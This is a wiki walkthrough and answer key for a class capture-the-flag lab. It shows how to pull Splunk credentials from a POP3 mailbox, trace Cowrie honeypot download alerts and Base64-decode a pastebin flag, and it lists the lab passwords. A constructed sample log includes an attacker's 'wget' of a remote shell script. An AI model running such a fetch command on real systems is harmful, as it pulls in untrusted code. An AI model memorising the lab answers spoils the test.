Final Project - Justin-Boyd/CIT-Class GitHub Wiki

Scenario

An organization’s monitoring system identified suspicious download activity captured by a honeypot named Cowrie. The event was recorded in the Splunk system, but that system cannot be accessed because its operator, who was the head of the security investigation team, was recently let go by the company. You were hired as a security analyst not long after.

Because of these recent events, there wasn’t enough time to provide you with all the information required to access the system freely. However, the system administrator was able to give you access to the mail server, and told you that all the data needed to access the system is stored on that server.

Your objective is to connect to the Splunk system, investigate the events, and identify a suspicious message to obtain the FLAG.

Environment Setup

Step 1

  • Double-click the CIT_Final OVA to import it.

Step 2

  • Deselect the USB Controller to prevent potential errors, and click Import.

Step 3

  • In the VirtualBox Manager, click File and select Preferences, then edit NatNetwork so that it uses the 192.168.1.0/24 network.

Step 4

  • Click Network, right-click NatNetwork, and select Edit to configure the network to use the 192.168.1.0/24 network.

Step 5

  • Right-click the Ubuntu CIT_Final VM and select Settings.

Step 6

  • Navigate to Network and make sure the adapter is attached to NAT Network with the name NatNetwork, and that Promiscuous Mode is set to Allow VMs.

Step 7

  • Right-click the Windows 10 CIT_Final VM and select Settings.

Step 8

  • Navigate to Network, set Attached to to NAT Network with the name NatNetwork, and set Promiscuous Mode to Allow VMs.

Step 9

  • Start both machines.

Step 10

  • Find the IP address of the Ubuntu VM and write it down.

Step 11

  • In the Windows 10 VM, press Winkey + R, type cmd, and click OK.

Step 12

  • In the command prompt, ping the Ubuntu machine to verify that the two VMs can communicate.

Preliminary Notes

The machine contains a honeypot that alerts Splunk whenever someone tries to connect to the machine over SSH. If that happens too often, solving the challenge becomes much harder for the students, since Splunk keeps generating new alerts for every SSH connection attempt.

Troubleshooting purposes only

  • You can log in to the machine with the following credentials:
    • Username: janed
    • Password: toor

SSH is enabled on port 2332.

Task 1: Connect to the Mail Server

Step 1

  • Inspect the Ubuntu VM and note the message about the POP3 protocol.

Step 2

  • Which port does POP3 use?
Answer
POP3 communicates on port 110. 

Step 3

  • Use Telnet to connect to the POP3 service from PowerShell. Were you successful? Why?
Answer
Search for PowerShell, right-click it, and open it as administrator.
Use the command telnet 192.168.1.5 110 to try to connect to Ubuntu’s POP3 service.
Note that an error appears stating that Telnet is not installed.

Step 4

  • Install the Telnet client in the Windows 10 VM.
Answer
Search for Turn Windows features on or off and open that option.
Select Telnet Client, and click OK to install it.

Step 5

  • Try to establish the connection again, and log in once connected.
Answer
Run the command telnet 192.168.1.5 110.
Once connected, enter user johnd and then pass toor to log in.

Step 6

  • List the existing emails and examine them for interesting information.
Answer
Since we are dealing with a mail server, the list command displays the email messages stored on it. Go through them and look for anything interesting.
You may have to look through several messages before finding the email that contains the clue; this is the real-world aspect of the challenge.
The clue is in the fourth message; open it using the retr command.
Note the URI and credentials for Splunk provided in that email.
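The POP3 exchange from Steps 5 and 6 (USER, PASS, LIST, RETR, QUIT), as an added example that is not part of the original lab: a tiny fake POP3 server on loopback stands in for the Ubuntu VM, serving a constructed mailbox, and a poplib client logs in, lists the mailbox and retrieves every message to pull out any URL. The mailbox contents, the fake server and the function names are assumptions; only the johnd/toor credentials and the Splunk URL come from the lab.

```python
import poplib, re, socketserver, threading

# Constructed mailbox; as in the lab only message 4 holds the clue (lab Splunk URI).
MAILBOX = [
    "Subject: Welcome\r\n\r\nWelcome to the team.\r\n",
    "Subject: Lunch\r\n\r\nPizza on Friday.\r\n",
    "Subject: Badge\r\n\r\nCollect your badge at reception.\r\n",
    "Subject: Splunk\r\n\r\nSplunk: http://192.168.1.5:9080/ (creds: see vault)\r\n",
]
USER, PASSWORD = "johnd", "toor"  # the POP3 credentials given in the lab

class FakePop3(socketserver.StreamRequestHandler):
    """Just enough POP3 to answer USER, PASS, LIST, RETR and QUIT."""
    def handle(self):
        self.wfile.write(b"+OK fake POP3 ready\r\n")
        while line := self.rfile.readline():          # poplib sends CRLF lines
            cmd, _, arg = line.decode().strip().partition(" ")
            if cmd == "PASS" and arg != PASSWORD:
                self.wfile.write(b"-ERR auth failed\r\n")
            elif cmd == "LIST":                          # multi-line: ends with "."
                rows = "".join(f"{i} {len(m)}\r\n" for i, m in enumerate(MAILBOX, 1))
                self.wfile.write(f"+OK {len(MAILBOX)}\r\n{rows}.\r\n".encode())
            elif cmd == "RETR":
                self.wfile.write(f"+OK\r\n{MAILBOX[int(arg) - 1]}.\r\n".encode())
            elif cmd in ("USER", "PASS", "QUIT"):
                self.wfile.write(b"+OK\r\n")
            else:
                self.wfile.write(b"-ERR unsupported\r\n")

def find_clues(host, port):
    """Log in, LIST the mailbox, RETR every message; return {msg_no: [urls]}."""
    conn = poplib.POP3(host, port, timeout=5)
    conn.user(USER)
    conn.pass_(PASSWORD)
    hits = {}
    for n in range(1, len(conn.list()[1]) + 1):  # one "n size" row per message
        text = b"\n".join(conn.retr(n)[1]).decode()
        if urls := re.findall(r"https?://\S+", text):
            hits[n] = urls
    conn.quit()
    return hits

def run_demo():
    # Serve the fake mailbox on an ephemeral loopback port, then query it.
    srv = socketserver.TCPServer(("127.0.0.1", 0), FakePop3)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    hits = find_clues(*srv.server_address)
    srv.shutdown()
    srv.server_close()
    return hits
```

Against the real VM you would call find_clues("192.168.1.5", 110) instead of run_demo().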

Step 7

  • Browse to the provided URL and log in to the system.
Answer
Open the browser and go to http://192.168.1.5:9080/
Note: Splunk is served over HTTP here, not HTTPS. If the Splunk login page does not appear, the student may have tried to use HTTPS.
Use the credentials found in the email to log in to the system.

Task 2: Search for Suspicious Activity

Step 1

  • In the platform, search for records of the download attempt and investigate them to identify the potential sources.
Answer
In Splunk, click Search & Reporting to open the search interface.
Search for the keyword download, and set the time range to All time.
As you look through the results, you will notice honeypot alerts related to cowrie. Add this search term and search again. The investigation may require checking several log entries before finding the one that contains the flag; this is a real-world aspect of the challenge.
Investigating these events eventually leads to a specific set of alerts related to pastebin.com.

Step 2

  • Access the sources you located and search them for interesting information.
Answer
You will find multiple alerts related to pastebin. Only one URL in the alerts holds the data with the flag.
The correct URL is: https://pastebin.com/raw/0cs1NHvh

Step 3

  • Decode the messages located at the URLs and identify the flag.
Answer
The message ends with =, which is Base64 padding, so it is probably Base64 encoded.
Browse to https://www.base64decode.org/ and decode the message to reveal the flag.
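The Task 2 triage as an added example that is not part of the original lab: it filters constructed Cowrie-style JSON log lines down to file-download events, groups them by the host the download came from, and then decodes a Base64 paste body while treating the trailing = only as a hint and validating the alphabet and padding properly. Field names, source addresses and the paste body are assumptions; the pastebin URL is the one from the lab.

```python
import base64, binascii, json
from collections import defaultdict
from urllib.parse import urlparse

# Constructed log lines shaped like Cowrie's JSON events (field names assumed;
# sessions and source IPs are made up). The pastebin URL is the one from the lab.
SAMPLE_LOG = """
{"eventid":"cowrie.login.success","src_ip":"203.0.113.7","session":"a1","message":"login attempt [root/123456] succeeded"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","session":"a1","input":"wget http://198.51.100.9/x.sh"}
{"eventid":"cowrie.session.file_download","src_ip":"203.0.113.7","session":"a1","url":"http://198.51.100.9/x.sh","message":"Downloaded URL (http://198.51.100.9/x.sh)"}
{"eventid":"cowrie.session.file_download","src_ip":"198.51.100.23","session":"b2","url":"https://pastebin.com/raw/0cs1NHvh","message":"Downloaded URL (https://pastebin.com/raw/0cs1NHvh)"}
{"eventid":"cowrie.session.closed","src_ip":"198.51.100.23","session":"b2","message":"Connection lost"}
"""

def download_events(log_text):
    """Keep only file_download events, grouped by the host they fetched from."""
    by_host = defaultdict(list)
    for line in log_text.strip().splitlines():
        ev = json.loads(line)
        if ev.get("eventid") == "cowrie.session.file_download":
            by_host[urlparse(ev["url"]).hostname].append((ev["src_ip"], ev["url"]))
    return dict(by_host)

def decode_if_base64(text):
    """Return the decoded text if `text` is valid Base64 that decodes to UTF-8,
    else None. A trailing '=' is only a hint: padding appears only when the
    input length is not a multiple of 3, and the alphabet check is what counts."""
    s = "".join(text.split())                 # tolerate wrapped paste text
    if not s or len(s) % 4:
        return None
    try:
        return base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

# Constructed stand-in for the paste body; the lab's real flag text differs.
PASTE_BODY = "ZmxhZ3tva30="
```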

Flag

The Flag Is
Congrats, you have finished CIT_FINAL successfully